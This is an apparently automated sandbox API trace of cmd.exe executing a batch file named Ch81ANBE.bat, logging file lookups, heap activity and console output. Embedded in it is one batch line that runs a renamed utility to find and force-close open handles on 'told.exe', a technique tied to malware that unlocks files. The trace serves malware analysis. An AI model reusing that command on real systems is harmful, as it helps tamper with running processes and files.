(HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0228.846] GetProcessHeap () returned 0x860000 [0228.846] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x70) returned 0x861190 [0228.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x45e858, lpFilePart=0x45e850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x45e850*="Ch81ANBE.bat") returned 0x32 [0228.846] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x861208 [0228.847] FindClose (in: hFindFile=0x861208 | out: hFindFile=0x861208) returned 1 [0228.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x861208 [0228.847] FindClose (in: hFindFile=0x861208 | out: hFindFile=0x861208) returned 1 [0228.847] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0228.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x861208 [0228.847] FindClose (in: hFindFile=0x861208 | out: hFindFile=0x861208) returned 1 [0228.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x861208 [0228.847] FindClose (in: hFindFile=0x861208 | out: hFindFile=0x861208) returned 1 [0228.847] GetProcessHeap () returned 0x860000 [0228.847] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x56) returned 0x861208 [0228.847] GetProcessHeap () returned 0x860000 [0228.847] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0228.849] _tell (_FileHandle=3) returned 78 [0228.849] _close (_FileHandle=3) returned 0 [0228.849] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ee9c | out: _Buffer="\r\n") returned 2 [0228.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.849] GetFileType (hFile=0x7) returned 0x2 [0228.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee5c | out: lpMode=0x45ee5c) returned 1 [0228.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ee88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ee88*=0x2) returned 1 [0228.851] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.851] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.851] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ee98 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0228.851] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ee98 | out: _Buffer=">") returned 1 [0228.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.851] GetFileType (hFile=0x7) returned 0x2 [0228.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee60 | out: lpMode=0x45ee60) returned 1 [0228.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ee8c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ee8c*=0x26) returned 1 [0228.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.852] GetFileType (hFile=0x7) returned 0x2 [0228.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0e4 | out: lpMode=0x45f0e4) returned 1 [0228.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.853] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x860d40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f110, lpReserved=0x0 | out: lpBuffer=0x860d40*, lpNumberOfCharsWritten=0x45f110*=0x2) returned 1 [0228.853] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f11c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0228.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.853] GetFileType (hFile=0x7) returned 0x2 [0228.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.854] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.854] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x2d) returned 1 [0228.854] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45f13c | out: _Buffer="\r\n") returned 2 [0228.854] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.854] GetFileType (hFile=0x7) returned 0x2 [0228.854] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.854] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0fc | out: lpMode=0x45f0fc) returned 1 [0228.855] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.855] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f128*=0x2) returned 1 [0228.855] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0228.855] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0228.855] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0228.855] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0228.855] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0228.855] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0228.855] GetConsoleTitleW (in: lpConsoleTitle=0x45ecac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.856] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.856] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.856] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x45ea68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x45ea60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x45ea60*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0228.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45e804 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x45e804, lpFilePart=0x45e800 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x45e800*=0x0) returned 0x26 [0228.856] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.856] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x45e580 | out: lpFindFileData=0x45e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x8743d8 [0228.856] FindClose (in: hFindFile=0x8743d8 | out: hFindFile=0x8743d8) returned 1 [0228.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x45e580 | out: lpFindFileData=0x45e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x8743d8 [0228.857] FindClose (in: hFindFile=0x8743d8 | out: hFindFile=0x8743d8) returned 1 [0228.857] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0228.857] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x45e580 | out: lpFindFileData=0x45e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x8743d8 [0228.857] FindClose (in: hFindFile=0x8743d8 | out: hFindFile=0x8743d8) returned 1 [0228.857] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.857] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0228.857] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0228.857] GetProcessHeap () returned 0x860000 [0228.857] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0228.857] GetEnvironmentStringsW () returned 0x874be8* [0228.857] GetProcessHeap () returned 0x860000 [0228.857] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb78) returned 0x875f78 [0228.857] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0228.857] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.857] GetProcessHeap () returned 0x860000 [0228.857] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874378 | out: hHeap=0x860000) returned 1 [0228.857] GetProcessHeap () returned 0x860000 [0228.857] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874318 | out: hHeap=0x860000) returned 1 [0228.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.857] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.858] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.858] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.859] SetConsoleInputExeNameW () returned 0x1 [0228.859] GetConsoleOutputCP () returned 0x1b5 [0228.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0228.860] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0228.860] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.860] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8742a8 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874238 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8741c8 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874158 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d38 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861268 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861208 | out: hHeap=0x860000) returned 1 [0228.860] GetProcessHeap () returned 0x860000 [0228.860] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861190 | out: hHeap=0x860000) returned 1 [0228.861] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.861] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.861] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0x94, lpOverlapped=0x0) returned 1 [0228.861] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0228.861] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.861] GetFileType (hFile=0x78) returned 0x1 [0228.861] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.861] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.861] GetProcessHeap () returned 0x860000 [0228.861] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0228.861] GetProcessHeap () returned 0x860000 [0228.861] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x4008) returned 0x888b08 [0228.863] GetProcessHeap () returned 0x860000 [0228.863] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xe) returned 0x860d38 [0228.863] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"told.exe\"") returned 0xa [0228.863] GetProcessHeap () returned 0x860000 [0228.863] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d38 | out: hHeap=0x860000) returned 1 [0228.863] GetProcessHeap () returned 0x860000 [0228.863] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x888b08 | out: hHeap=0x860000) returned 1 [0228.863] GetProcessHeap () returned 0x860000 [0228.863] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0228.870] _tell (_FileHandle=3) returned 226 [0228.870] _close (_FileHandle=3) returned 0 [0228.870] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ee9c | out: _Buffer="\r\n") returned 2 [0228.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.870] GetFileType (hFile=0x7) returned 0x2 [0228.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee5c | out: lpMode=0x45ee5c) returned 1 [0228.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.871] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ee88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ee88*=0x2) returned 1 [0228.871] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.871] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.871] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ee98 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0228.872] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ee98 | out: _Buffer=">") returned 1 [0228.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.872] GetFileType (hFile=0x7) returned 0x2 [0228.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee60 | out: lpMode=0x45ee60) returned 1 [0228.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.872] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ee8c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ee8c*=0x26) returned 1 [0228.873] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x45f11c | out: _Buffer="FOR") returned 3 [0228.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.873] GetFileType (hFile=0x7) returned 0x2 [0228.873] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.873] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.874] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x3) returned 1 [0228.874] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x45f11c | out: _Buffer=" /F") returned 3 [0228.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.874] GetFileType (hFile=0x7) returned 0x2 [0228.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.875] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x3) returned 1 [0228.875] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x45f11c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0228.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.875] GetFileType (hFile=0x7) returned 0x2 [0228.875] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.875] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.876] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x20) returned 1 [0228.876] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x45f11c | out: _Buffer=" %I IN ") returned 7 [0228.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.876] GetFileType (hFile=0x7) returned 0x2 [0228.876] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.876] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.877] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x7) returned 1 [0228.877] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x45f118 | out: _Buffer="(`tdq963ii.exe -accepteula \"told.exe\" -nobanner`) DO ") returned 53 [0228.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.877] GetFileType (hFile=0x7) returned 0x2 [0228.877] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0d8 | out: lpMode=0x45f0d8) returned 1 [0228.878] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.878] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x45f104, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f104*=0x35) returned 1 [0228.878] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.878] GetFileType (hFile=0x7) returned 0x2 [0228.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.879] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0e4 | out: lpMode=0x45f0e4) returned 1 [0228.879] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.879] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x45f110, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x45f110*=0x1) returned 1 [0228.879] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.879] GetFileType (hFile=0x7) returned 0x2 [0228.880] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.880] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0c8 | out: lpMode=0x45f0c8) returned 1 [0228.880] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.880] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x874290*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x45f0f4, lpReserved=0x0 | out: lpBuffer=0x874290*, lpNumberOfCharsWritten=0x45f0f4*=0xc) returned 1 [0228.881] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f100 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0228.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.881] GetFileType (hFile=0x7) returned 0x2 [0228.881] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0c0 | out: lpMode=0x45f0c0) returned 1 [0228.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.881] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45f0ec, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f0ec*=0x26) returned 1 [0228.882] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f11c | out: _Buffer=") ") returned 2 [0228.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.882] GetFileType (hFile=0x7) returned 0x2 [0228.882] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.882] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.883] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x2) returned 1 [0228.883] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45f13c | out: _Buffer="\r\n") returned 2 [0228.883] 